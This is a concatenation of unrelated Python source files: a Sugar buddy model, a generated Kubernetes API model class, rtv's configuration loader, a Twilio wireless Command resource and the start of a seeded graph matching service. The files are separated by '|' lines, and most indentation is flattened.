properties = {}
if self.props.key is not None:
properties['key'] = dbus.ByteArray(self.props.key)
if self.props.color is not None:
properties['color'] = self.props.color.to_string()
logging.debug('calling SetProperties with %r', properties)
connection[CONNECTION_INTERFACE_BUDDY_INFO].SetProperties(
properties,
reply_handler=self.__set_properties_cb,
error_handler=self.__error_handler_cb)
def __set_properties_cb(self):
logging.debug('__set_properties_cb')
def __error_handler_cb(self, error):
raise RuntimeError(error)
def __connection_added_cb(self, conn_watcher, connection):
self._sync_properties_on_connection(connection)
def is_owner(self):
return True
def get_owner_instance():
global _owner_instance
if _owner_instance is None:
_owner_instance = OwnerBuddyModel()
return _owner_instance
class BuddyModel(BaseBuddyModel):
__gtype_name__ = 'SugarBuddyModel'
def __init__(self, **kwargs):
self._account = None
self._contact_id = None
self._handle = None
BaseBuddyModel.__init__(self, **kwargs)
def is_owner(self):
return False
def get_account(self):
return self._account
def set_account(self, account):
self._account = account
account = GObject.property(type=object, getter=get_account,
setter=set_account)
def get_contact_id(self):
return self._contact_id
def set_contact_id(self, contact_id):
self._contact_id = contact_id
contact_id = GObject.property(type=object, getter=get_contact_id,
setter=set_contact_id)
def get_handle(self):
return self._handle
def set_handle(self, handle):
self._handle = handle
handle = GObject.property(type=object, getter=get_handle,
setter=set_handle)
|
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1ReplicationControllerCondition(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'last_transition_time': 'datetime',
'message': 'str',
'reason': 'str',
'status': 'str',
'type': 'str'
}
attribute_map = {
'last_transition_time': 'lastTransitionTime',
'message': 'message',
'reason': 'reason',
'status': 'status',
'type': 'type'
}
def __init__(self, last_transition_time=None, message=None, reason=None, status=None, type=None, local_vars_configuration=None): # noqa: E501
"""V1ReplicationControllerCondition - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._last_transition_time = None
self._message = None
self._reason = None
self._status = None
self._type = None
self.discriminator = None
if last_transition_time is not None:
self.last_transition_time = last_transition_time
if message is not None:
self.message = message
if reason is not None:
self.reason = reason
self.status = status
self.type = type
@property
def last_transition_time(self):
"""Gets the last_transition_time of this V1ReplicationControllerCondition. # noqa: E501
The last time the condition transitioned from one status to another. # noqa: E501
:return: The last_transition_time of this V1ReplicationControllerCondition. # noqa: E501
:rtype: datetime
"""
return self._last_transition_time
@last_transition_time.setter
def last_transition_time(self, last_transition_time):
"""Sets the last_transition_time of this V1ReplicationControllerCondition.
The last time the condition transitioned from one status to another. # noqa: E501
:param last_transition_time: The last_transition_time of this V1ReplicationControllerCondition. # noqa: E501
:type: datetime
"""
self._last_transition_time = last_transition_time
@property
def message(self):
"""Gets the message of this V1ReplicationControllerCondition. # noqa: E501
A human readable message indicating details about the transition. # noqa: E501
:return: The message of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""Sets the message of this V1ReplicationControllerCondition.
A human readable message indicating details about the transition. # noqa: E501
:param message: The message of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
self._message = message
@property
def reason(self):
"""Gets the reason of this V1ReplicationControllerCondition. # noqa: E501
The reason for the condition's last transition. # noqa: E501
:return: The reason of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._reason
@reason.setter
def reason(self, reason):
"""Sets the reason of this V1ReplicationControllerCondition.
The reason for the condition's last transition. # noqa: E501
:param reason: The reason of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
self._reason = reason
@property
def status(self):
"""Gets the status of this V1ReplicationControllerCondition. # noqa: E501
Status of the condition, one of True, False, Unknown. # noqa: E501
:return: The status of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1ReplicationControllerCondition.
Status of the condition, one of True, False, Unknown. # noqa: E501
:param status: The status of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and status is None: # noqa: E501
raise ValueError("Invalid value for `status`, must not be `None`") # noqa: E501
self._status = status
@property
def type(self):
"""Gets the type of this V1ReplicationControllerCondition. # noqa: E501
Type of replication controller condition. # noqa: E501
:return: The type of this V1ReplicationControllerCondition. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this V1ReplicationControllerCondition.
Type of replication controller condition. # noqa: E501
:param type: The type of this V1ReplicationControllerCondition. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1ReplicationControllerCondition):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1ReplicationControllerCondition):
return True
return self.to_dict() != other.to_dict()
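# Illustrative sketch, not part of the generated module: builds a condition and
# inspects to_dict(), which returns a plain dict keyed by the snake_case names in
# openapi_types; the camelCase names in attribute_map are used by the API client
# when serializing to JSON. The field values below are made up.
def _example_condition_to_dict():
    cond = V1ReplicationControllerCondition(
        status='True',
        type='ReplicaFailure',
        reason='FailedCreate',
        message='example message')
    result = cond.to_dict()
    # {'last_transition_time': None, 'message': 'example message',
    #  'reason': 'FailedCreate', 'status': 'True', 'type': 'ReplicaFailure'}
    return result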
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import codecs
import shutil
import argparse
from functools import partial
import six
from six.moves import configparser
from . import docs, __version__
from .objects import KeyMap
PACKAGE = os.path.dirname(__file__)
HOME = os.path.expanduser('~')
TEMPLATES = os.path.join(PACKAGE, 'templates')
DEFAULT_CONFIG = os.path.join(TEMPLATES, 'rtv.cfg')
DEFAULT_MAILCAP = os.path.join(TEMPLATES, 'mailcap')
DEFAULT_THEMES = os.path.join(PACKAGE, 'themes')
XDG_CONFIG_HOME = os.getenv('XDG_CONFIG_HOME', os.path.join(HOME, '.config'))
XDG_DATA_HOME = os.getenv('XDG_DATA_HOME', os.path.join(HOME, '.local', 'share'))
CONFIG = os.path.join(XDG_CONFIG_HOME, 'rtv', 'rtv.cfg')
MAILCAP = os.path.join(HOME, '.mailcap')
TOKEN = os.path.join(XDG_DATA_HOME, 'rtv', 'refresh-token')
HISTORY = os.path.join(XDG_DATA_HOME, 'rtv', 'history.log')
THEMES = os.path.join(XDG_CONFIG_HOME, 'rtv', 'themes')
def build_parser():
parser = argparse.ArgumentParser(
prog='rtv', description=docs.SUMMARY,
epilog=docs.CONTROLS,
usage=docs.USAGE,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
'link', metavar='URL', nargs='?',
help='[optional] Full URL of a submission to open')
parser.add_argument(
'-s', dest='subreddit',
help='Name of the subreddit that will be loaded on start')
parser.add_argument(
'-l', dest='link_deprecated',
help=argparse.SUPPRESS) # Deprecated, use the positional arg instead
parser.add_argument(
'--log', metavar='FILE', action='store',
help='Log HTTP requests to the given file')
parser.add_argument(
'--config', metavar='FILE', action='store',
help='Load configuration settings from the given file')
parser.add_argument(
'--ascii', action='store_const', const=True,
help='Enable ascii-only mode')
parser.add_argument(
'--monochrome', action='store_const', const=True,
help='Disable color')
parser.add_argument(
'--theme', metavar='FILE', action='store',
help='Color theme to use, see --list-themes for valid options')
parser.add_argument(
'--list-themes', metavar='FILE', action='store_const', const=True,
help='List all of the available color themes')
parser.add_argument(
'--non-persistent', dest='persistent', action='store_const', const=False,
help='Forget the authenticated user when the program exits')
parser.add_argument(
'--no-autologin', dest='autologin', action='store_const', const=False,
help='Do not authenticate automatically on startup')
parser.add_argument(
'--clear-auth', dest='clear_auth', action='store_const', const=True,
help='Remove any saved user data before launching')
parser.add_argument(
'--copy-config', dest='copy_config', action='store_const', const=True,
help='Copy the default configuration to {HOME}/.config/rtv/rtv.cfg')
parser.add_argument(
'--copy-mailcap', dest='copy_mailcap', action='store_const', const=True,
help='Copy an example mailcap configuration to {HOME}/.mailcap')
parser.add_argument(
'--enable-media', dest='enable_media', action='store_const', const=True,
help='Open external links using programs defined in the mailcap config')
parser.add_argument(
'-V', '--version', action='version', version='rtv ' + __version__)
parser.add_argument(
'--no-flash', dest='flash', action='store_const', const=False,
help='Disable screen flashing')
parser.add_argument(
'--debug-info', dest='debug_info', action='store_const', const=True,
help='Show system and environment information and exit')
return parser
def copy_default_mailcap(filename=MAILCAP):
"""
Copy the example mailcap configuration to the specified file.
"""
return _copy_settings_file(DEFAULT_MAILCAP, filename, 'mailcap')
def copy_default_config(filename=CONFIG):
"""
Copy the default rtv user configuration to the specified file.
"""
return _copy_settings_file(DEFAULT_CONFIG, filename, 'config')
def _copy_settings_file(source, destination, name):
"""
Copy a file from the repo to the user's home directory.
"""
if os.path.exists(destination):
try:
ch = six.moves.input(
'File %s already exists, overwrite? (y/[n]): ' % destination)
if ch not in ('Y', 'y'):
return
except KeyboardInterrupt:
return
filepath = os.path.dirname(destination)
if not os.path.exists(filepath):
os.makedirs(filepath)
print('Copying default %s to %s' % (name, destination))
shutil.copy(source, destination)
os.chmod(destination, 0o664)
class OrderedSet(object):
"""
A simple implementation of an ordered set. A set is used to check
for membership, and a list is used to maintain ordering.
"""
def __init__(self, elements=None):
elements = elements or []
self._set = set(elements)
self._list = elements
def __contains__(self, item):
return item in self._set
def __len__(self):
return len(self._list)
def __getitem__(self, item):
return self._list[item]
def add(self, item):
self._set.add(item)
self._list.append(item)
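# Illustrative sketch, not part of the original module: OrderedSet pairs a set
# (fast membership tests) with a list (insertion order preserved), which is what
# lets Config trim the history file to the newest entries while still checking
# cheaply whether a URL has been seen.
def _example_ordered_set():
    history = OrderedSet(['a', 'b'])
    history.add('c')
    assert 'b' in history        # backed by the set
    assert history[-1] == 'c'    # backed by the list
    assert len(history) == 3
    return history[:2]           # slicing goes through __getitem__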
class Config(object):
"""
This class manages the loading and saving of configs and other files.
"""
def __init__(self, history_file=HISTORY, token_file=TOKEN, **kwargs):
self.history_file = history_file
self.token_file = token_file
self.config = kwargs
default, bindings = self.get_file(DEFAULT_CONFIG)
self.default = default
self.keymap = KeyMap(bindings)
# `refresh_token` and `history` are saved/loaded at separate locations,
# so they are treated differently from the rest of the config options.
self.refresh_token = None
self.history = OrderedSet()
def __getitem__(self, item):
if item in self.config:
return self.config[item]
else:
return self.default.get(item, None)
def __setitem__(self, key, value):
self.config[key] = value
def __delitem__(self, key):
self.config.pop(key, None)
def update(self, **kwargs):
self.config.update(kwargs)
def load_refresh_token(self):
if os.path.exists(self.token_file):
with open(self.token_file) as fp:
self.refresh_token = fp.read().strip()
else:
self.refresh_token = None
def save_refresh_token(self):
self._ensure_filepath(self.token_file)
with open(self.token_file, 'w+') as fp:
fp.write(self.refresh_token)
def delete_refresh_token(self):
if os.path.exists(self.token_file):
os.remove(self.token_file)
self.refresh_token = None
def load_history(self):
if os.path.exists(self.history_file):
with codecs.open(self.history_file, encoding='utf-8') as fp:
self.history = OrderedSet([line.strip() for line in fp])
else:
self.history = OrderedSet()
def save_history(self):
self._ensure_filepath(self.history_file)
with codecs.open(self.history_file, 'w+', encoding='utf-8') as fp:
fp.writelines('\n'.join(self.history[-self['history_size']:]))
def delete_history(self):
if os.path.exists(self.history_file):
os.remove(self.history_file)
self.history = OrderedSet()
@staticmethod
def get_args():
"""
Load settings from the command line.
"""
parser = build_parser()
args = vars(parser.parse_args())
# Overwrite the deprecated "-l" option into the link variable
if args['link_deprecated'] and args['link'] is None:
args['link'] = args['link_deprecated']
args.pop('link_deprecated', None)
# Filter out argument values that weren't supplied
return {key: val for key, val in args.items() if val is not None}
@classmethod
def get_file(cls, filename=None):
"""
Load settings from an rtv configuration file.
"""
if filename is None:
filename = CONFIG
config = configparser.ConfigParser()
if os.path.exists(filename):
with codecs.open(filename, encoding='utf-8') as fp:
config.readfp(fp)
return cls._parse_rtv_file(config)
@staticmethod
def _parse_rtv_file(config):
rtv = {}
if config.has_section('rtv'):
rtv = dict(config.items('rtv'))
# convert non-string params to their typed representation
params = {
'ascii': partial(config.getboolean, 'rtv'),
'monochrome': partial(config.getboolean, 'rtv'),
'persistent': partial(config.getboolean, 'rtv'),
'autologin': partial(config.getboolean, 'rtv'),
'clear_auth': partial(config.getboolean, 'rtv'),
'enable_media': partial(config.getboolean, 'rtv'),
'history_size': partial(config.getint, 'rtv'),
'oauth_redirect_port': partial(config.getint, 'rtv'),
'oauth_scope': lambda x: rtv[x].split(','),
'max_comment_cols': partial(config.getint, 'rtv'),
'max_pager_cols': partial(config.getint, 'rtv'),
'hide_username': partial(config.getboolean, 'rtv'),
'flash': partial(config.getboolean, 'rtv'),
'force_new_browser_window': partial(config.getboolean, 'rtv')
}
for key, func in params.items():
if key in rtv:
rtv[key] = func(key)
bindings = {}
if config.has_section('bindings'):
bindings = dict(config.items('bindings'))
for name, keys in bindings.items():
bindings[name] = [key.strip() for key in keys.split(',')]
return rtv, bindings
@staticmethod
def _ensure_filepath(filename):
"""
Ensure that the directory exists before trying to write to the file.
"""
filepath = os.path.dirname(filename)
if not os.path.exists(filepath):
os.makedirs(filepath)
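# Illustrative sketch, not part of the original module: shows how
# Config._parse_rtv_file() converts raw [rtv] options into typed values and how
# [bindings] entries are split into key lists. The config text is made up for
# this example.
def _example_parse_rtv_file():
    import io
    text = u"""
[rtv]
ascii = true
history_size = 200
oauth_scope = edit,history,read
[bindings]
SUBREDDIT_SEARCH = s,/
"""
    config = configparser.ConfigParser()
    config.readfp(io.StringIO(text))
    rtv, bindings = Config._parse_rtv_file(config)
    # rtv == {'ascii': True, 'history_size': 200,
    #         'oauth_scope': ['edit', 'history', 'read']}
    # bindings == {'subreddit_search': ['s', '/']}
    return rtv, bindings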
|
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class CommandList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version):
"""
Initialize the CommandList
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.wireless.command.CommandList
:rtype: twilio.rest.preview.wireless.command.CommandList
"""
super(CommandList, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/Commands'.format(**self._solution)
def stream(self, device=values.unset, sim=values.unset, status=values.unset,
direction=values.unset, limit=None, page_size=None):
"""
Streams CommandInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param unicode device: The device
:param unicode sim: The sim
:param unicode status: The status
:param unicode direction: The direction
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.command.CommandInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
device=device,
sim=sim,
status=status,
direction=direction,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, device=values.unset, sim=values.unset, status=values.unset,
direction=values.unset, limit=None, page_size=None):
"""
Lists CommandInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param unicode device: The device
:param unicode sim: The sim
:param unicode status: The status
:param unicode direction: The direction
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.preview.wireless.command.CommandInstance]
"""
return list(self.stream(
device=device,
sim=sim,
status=status,
direction=direction,
limit=limit,
page_size=page_size,
))
def page(self, device=values.unset, sim=values.unset, status=values.unset,
direction=values.unset, page_token=values.unset,
page_number=values.unset, page_size=values.unset):
"""
Retrieve a single page of CommandInstance records from the API.
Request is executed immediately
:param unicode device: The device
:param unicode sim: The sim
:param unicode status: The status
:param unicode direction: The direction
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandPage
"""
params = values.of({
'Device': device,
'Sim': sim,
'Status': status,
'Direction': direction,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return CommandPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of CommandInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return CommandPage(self._version, response, self._solution)
def create(self, command, device=values.unset, sim=values.unset,
callback_method=values.unset, callback_url=values.unset,
command_mode=values.unset, include_sid=values.unset):
"""
Create a new CommandInstance
:param unicode command: The command
:param unicode device: The device
:param unicode sim: The sim
:param unicode callback_method: The callback_method
:param unicode callback_url: The callback_url
:param unicode command_mode: The command_mode
:param unicode include_sid: The include_sid
:returns: Newly created CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
data = values.of({
'Command': command,
'Device': device,
'Sim': sim,
'CallbackMethod': callback_method,
'CallbackUrl': callback_url,
'CommandMode': command_mode,
'IncludeSid': include_sid,
})
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return CommandInstance(self._version, payload, )
def get(self, sid):
"""
Constructs a CommandContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.command.CommandContext
:rtype: twilio.rest.preview.wireless.command.CommandContext
"""
return CommandContext(self._version, sid=sid, )
def __call__(self, sid):
"""
Constructs a CommandContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.command.CommandContext
:rtype: twilio.rest.preview.wireless.command.CommandContext
"""
return CommandContext(self._version, sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.CommandList>'
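# Illustrative sketch, not part of the generated module: typical read access to
# this list resource. The traversal `client.preview.wireless.commands` is an
# assumption based on this module's package path
# (twilio.rest.preview.wireless.command); the credentials and limit are
# placeholders.
def _example_list_commands(account_sid, auth_token):
    from twilio.rest import Client   # top-level Twilio SDK client
    client = Client(account_sid, auth_token)
    # list() loads up to `limit` records eagerly; stream() pages lazily instead
    commands = client.preview.wireless.commands.list(limit=20)
    return [(c.sid, c.status) for c in commands]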
class CommandPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, response, solution):
"""
Initialize the CommandPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.preview.wireless.command.CommandPage
:rtype: twilio.rest.preview.wireless.command.CommandPage
"""
super(CommandPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of CommandInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.preview.wireless.command.CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
return CommandInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.CommandPage>'
class CommandContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, sid):
"""
Initialize the CommandContext
:param Version version: Version that contains the resource
:param sid: The sid
:returns: twilio.rest.preview.wireless.command.CommandContext
:rtype: twilio.rest.preview.wireless.command.CommandContext
"""
super(CommandContext, self).__init__(version)
# Path Solution
self._solution = {'sid': sid, }
self._uri = '/Commands/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch a CommandInstance
:returns: Fetched CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return CommandInstance(self._version, payload, sid=self._solution['sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.CommandContext {}>'.format(context)
class CommandInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact [email protected]. """
def __init__(self, version, payload, sid=None):
"""
Initialize the CommandInstance
:returns: twilio.rest.preview.wireless.command.CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
super(CommandInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'account_sid': payload.get('account_sid'),
'device_sid': payload.get('device_sid'),
'sim_sid': payload.get('sim_sid'),
'command': payload.get('command'),
'command_mode': payload.get('command_mode'),
'status': payload.get('status'),
'direction': payload.get('direction'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: CommandContext for this CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandContext
"""
if self._context is None:
self._context = CommandContext(self._version, sid=self._solution['sid'], )
return self._context
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def device_sid(self):
"""
:returns: The device_sid
:rtype: unicode
"""
return self._properties['device_sid']
@property
def sim_sid(self):
"""
:returns: The sim_sid
:rtype: unicode
"""
return self._properties['sim_sid']
@property
def command(self):
"""
:returns: The command
:rtype: unicode
"""
return self._properties['command']
@property
def command_mode(self):
"""
:returns: The command_mode
:rtype: unicode
"""
return self._properties['command_mode']
@property
def status(self):
"""
:returns: The status
:rtype: unicode
"""
return self._properties['status']
@property
def direction(self):
"""
:returns: The direction
:rtype: unicode
"""
return self._properties['direction']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date_updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def url(self):
"""
:returns: The url
:rtype: unicode
"""
return self._properties['url']
def fetch(self):
"""
Fetch a CommandInstance
:returns: Fetched CommandInstance
:rtype: twilio.rest.preview.wireless.command.CommandInstance
"""
return self._proxy.fetch()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.CommandInstance {}>'.format(context)
|
|
import bson
import bson.json_util
import pymongo
import json
from bson import ObjectId
# from pymongo import Connection
import string
import tangelo
import numpy as np
import networkx as nx
from networkx.readwrite import json_graph
import rpy2.robjects as robjects
import rpy2.robjects.numpy2ri
rpy2.robjects.numpy2ri.activate()
# Service wrapper around the Seeded Graph Matching (SGM) algorithm developed by the
# Johns Hopkins XDATA team. Several support routines are listed first, followed by
# the main interface routine at the bottom.
def addNodesToGraph(g, count):
current_node_count = len(g.nodes())
for i in range(count):
g.add_node(current_node_count + i)
# return common names and the matching ID pairs from a pair of graphs. This uses the 'name' attribute on each
# node to find and return a set of nodes where the names matched. This can be used to generate seeds for a
# graph, where it is known that the corresponding entities are supposed to be paired.
def returnCommonMatches(ga,gb):
#first, build dictionaries off all the names
gaNames = {}
gbNames = {}
matchingdict = {}
# insert the names into dictionaries so we have a unique list, eliminate duplicates
for name in nx.get_node_attributes(ga,'name').values():
gaNames[name] = name
for name in nx.get_node_attributes(gb,'name').values():
gbNames[name] = name
for name in gaNames.keys():
if name in gbNames.keys():
# find the nodeIDs for this name
id_a = nameToNode(ga,name)
id_b = nameToNode(gb,name)
matchingdict[name] = [id_a,id_b]
return matchingdict
# this shuffles the nodes so any nodes identified in the seed list are placed at the beginning of the list of
# nodes in the graph. This is a necessary precondition for the SGM algorithm. It assumes the first m of n
# vertices in each of the graphs correspond to the seeds.
def rearrangeGraphWithSeeds(ingraph,seedList):
# this routine expects a graph with node IDs as character strings of integers (e.g. '0', '1', etc.),
# which is the way networkX reads graphML files. It recognizes a set of seed nodes
# and swaps nodes so the seeds are always at the beginning of the graph.
head = 0
substitutions = {}
# copy the seeds into the front of the graph
for seednode in seedList:
# generally we want to move from the head, but there is a special case that will override
# this, so a variable is needed
source = head
# if the seed node and head are equal, we don't have to swap anything
if seednode != head:
if head in ingraph.nodes():
# if the node pointed to by seednode has already been moved by a previous seed, then
# make this substitution against the node in its new location.
if seednode in substitutions.keys():
source = substitutions[seednode]
destination = head
else:
destination = seednode
#print "Seed: ", seednode, "Head: ", head, "Source: ", source, "Destination: ", destination
# there is already a node where we want to put this seed. Swap the nodes
mapping = {source : 'temp'}
ingraph = nx.relabel_nodes(ingraph,mapping,copy=False)
mapping = {destination: source}
ingraph = nx.relabel_nodes(ingraph,mapping,copy=False)
mapping = {'temp' : destination}
ingraph = nx.relabel_nodes(ingraph,mapping,copy=False)
substitutions[source] = destination
else:
# no node exists where we want to put the seed, just relabel the node
mapping = {seednode: source}
ingraph = nx.relabel_nodes(ingraph,mapping,copy=False)
# this moves even on the case where the seed matches the head
head = head+ 1
return substitutions
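# Worked example (illustrative): with integer-labelled nodes [0, 1, 2, 3] and
# seedList = [2], the seed node 2 is swapped with the current head 0, so the seed
# ends up labelled 0 and the former node 0 is relabelled 2; the returned
# substitutions dict is {0: 2}.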
def findCorrespondingNodeInMatrix(mat,size, seedcount,node):
    # we are looking for which element of the node's row is set
found = False
for colindex in range(size):
offset = (node-1)*size+colindex
if mat[offset] == 1:
found = True;
return colindex
if (found == False):
print "error, couldn't find matching node for ",node
# was having trouble doing the linear indexing into the result array above, so use R to evaluate
# the sparse matrix
def findCorrespondingNodeInSparseMatrix(mat,size, seedcount,node):
    # we are looking for which element of the node's row is set
found = False
for colindex in range(size-seedcount-1):
# make a 2D query because not sure how to index python object successfully
content = 'P$D['+str(node+1)+','+str(colindex+1)+']'
if robjects.r(content)[0] > 0:
found = True;
return colindex
if (found == False):
#print "error, couldn't find matching node for ",node
return -1
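# Illustrative example of the R query built above: for node=4 and colindex=2 the
# string is 'P$D[5,3]' (R is 1-indexed, hence the +1 on both indices).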
def findCorrelatedNode(size, seedcount,node):
    # we are looking for which element of the node's row is set
found = False
corr = np.array(robjects.r('P$corr'))
# make a 1D query because not sure how to index python object successfully
matching = corr[node,1]
return matching-1
def run(graphAnodes,graphAedges,graphBnodes,graphBedges,seeds):
# building graphA, graphB networkX structures from the separate node & link structures
    # passed from javascript. For the moment, we don't allow multiple links between nodes or directed edges
# first decode the argument from being passed through a URL
graphAnodes_obj = bson.json_util.loads(graphAnodes)
graphAedges_obj = bson.json_util.loads(graphAedges)
graphBnodes_obj = bson.json_util.loads(graphBnodes)
graphBedges_obj = bson.json_util.loads(graphBedges)
seed_obj = bson.json_util.loads(seeds)
    # for some reason, edges are coming across pre-linked with nodes, let's just extract them
print "reassembling graph A and B"
# start with an empty graph instance
ga = nx.Graph()
# traverse through the nodes from the app and add them to the new graph instance
for value in graphAnodes_obj.itervalues():
print value
ga.add_node(value['id'])
# add node attributes, like name, etc. to new node
for attrib in value['data'][1]:
#print 'found attrib:', attrib
ga.node[value['id']][attrib] = value['data'][1][attrib]
# traverse through the edges
for link in graphAedges_obj.itervalues():
#print link
ga.add_edge(link['source'],link['target'])
print "received graph A:"
print ga.nodes()
#print ga.edges()
# start with an empty graph instance
gb = nx.Graph()
# traverse through the nodes from the app and add them to the new graph instance
for value in graphBnodes_obj.itervalues():
print value
gb.add_node(value['id'])
# add node attributes, like name, etc. to new node
for attrib in value['data'][1]:
#print 'found attrib:', attrib
gb.node[value['id']][attrib] = value['data'][1][attrib]
# traverse through the edges
for link in graphBedges_obj.itervalues():
#print link
gb.add_edge(link['source'],link['target'])
print "received graph B:"
print gb.nodes()
#print gb.edges()
nx.write_gml(ga,"/tmp/ga.gml")
nx.write_gml(gb,"/tmp/gb.gml")
# initialize igraph to get JHU SGM algorithm
robjects.r('library(igraph)')
    # check the number of nodes in the two graphs and add nodes to the smaller graph, so they have
